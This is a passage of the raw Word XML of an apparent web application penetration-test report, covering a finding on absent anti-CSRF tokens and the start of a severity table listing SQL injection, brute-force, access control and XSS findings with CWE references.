    <w:p w14:paraId="21381961" w14:textId="226F22B6" w:rsidR="002622EE" w:rsidRPr="008C18A2" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc93839320"/>
      <w:bookmarkStart w:id="114" w:name="_Toc94100245"/>
      <w:r w:rsidRPr="008C18A2">
        <w:t>Absence of Anti-CSRF Tokens</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="00325C35" w14:textId="2B112353" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:r w:rsidRPr="008E7806">
        <w:t xml:space="preserve">Cross-Site Request Forgery </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CSRF) </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66BE">
        <w:t>is an attack that involves forcing a victim to send a HTTP request to a target destination without their knowledge or intent to perform an action as the victim. The underlying cause is application functionality using predictable URL</w:t>
      </w:r>
      <w:r w:rsidR="00BB32D2">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66BE">
        <w:t xml:space="preserve">form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a </w:t>
      </w:r>
      <w:r w:rsidR="00F51319">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidRPr="003F66BE">
        <w:t xml:space="preserve"> has for a user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708190C" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00410FD6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C754ED" wp14:editId="4E120155">
            <wp:extent cx="5943600" cy="2320925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18946415" name="Picture 189464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15" name="Picture 18946415" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2320925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5B940" w14:textId="539BECBE" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7806">
        <w:t xml:space="preserve">The absence of Anti-CSRF tokens may lead to a Cross-Site Request Forgery </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CSRF) </w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t>attack that can result in executing a specific application action as another logged</w:t>
      </w:r>
      <w:r w:rsidR="00F51319">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t>in user</w:t>
      </w:r>
      <w:r w:rsidR="00B61EE2">
        <w:t>. For example</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t>, steal</w:t>
      </w:r>
      <w:r w:rsidR="00B61EE2">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t xml:space="preserve"> their account by changing their email and password or silently adding a new </w:t>
      </w:r>
      <w:r>
        <w:t>employee</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t xml:space="preserve"> user account when executed from the </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008E7806">
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>This vulnerability was detected by ZAP and Skip</w:t>
      </w:r>
      <w:r w:rsidR="00B61EE2">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ish</w:t>
      </w:r>
      <w:r w:rsidR="009F428D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> during vulnerability scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290B6F2" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A1FB7" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc94100246"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Severity Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="1B0F9636" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00590706" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:r>
        <w:t xml:space="preserve">The figure below depicts the severity table of the web application which consists of vulnerabilities discovered through automated scans as well as manual testing. Refer to the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Severity_Ranking_Table">
        <w:r w:rsidRPr="2B7306D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix A</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for the Severity Ranking Information.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4"/>
        <w:tblW w:w="9699" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="583"/>
        <w:gridCol w:w="1822"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2386"/>
        <w:gridCol w:w="1789"/>
      </w:tblGrid>
      <w:tr w:rsidR="002622EE" w14:paraId="51EFCD09" w14:textId="77777777" w:rsidTr="001E0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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40024A4B" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>S/N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32E8ED53" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE546F8" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72E06C4F" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A81933" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19DB6ECE" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Finding Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12368DEF" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CVE/CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="230508D1" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7799A97C" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D07E45E" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A1:2017-Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12D0E0C3" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="724B60EB"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>SQL Injection vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50D20D88"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>The software constructs all or part of an SQL command but it does not neutralize special elements that could modify the intended SQL command when it is sent to a downstream component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="255E057B"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="2294148D" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="132FF832" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32514778" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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A2:2017-Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732F8DFF" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="026773D0" w14:textId="5FD01980"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5F09">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication Brute-force </w:t>
            </w:r>
            <w:r w:rsidR="001D09C7">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>v</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5F09">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>ulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D2B5EC" w14:textId="77777777"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 xml:space="preserve">The remote web server seems to transmit credentials using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Form-based Authentication</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F9A03E5" w14:textId="77777777"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B40D6">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-307: Improper Restriction of Excessive Authentication Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="424F0BBD" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25E52D15" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63FF3985" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A5:2017-Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="514E9AAD" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F90C640"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Broken Access Control vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00125235"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve">The software does not restrict or incorrectly </w:t>
            </w:r>
            <w:r w:rsidRPr="2B7306D2">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>restrict</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve"> access to a resource from an unauthorized actor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59E85D45"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-284: Improper Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="15805C90" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D8239CF" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37F0A679" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A7:2017-Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="262F3591" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C26CBB2" w14:textId="47B51E26"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Cross</w:t>
            </w:r>
            <w:r w:rsidR="004966D9">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Site Scripting (XSS) vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77616B90" w14:textId="0A6DD814"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pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve">The software does not neutralize or </w:t>
            </w:r>
            <w:r w:rsidR="00E006D0">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t xml:space="preserve">incorrectly neutralizes </w:t>
            </w:r>
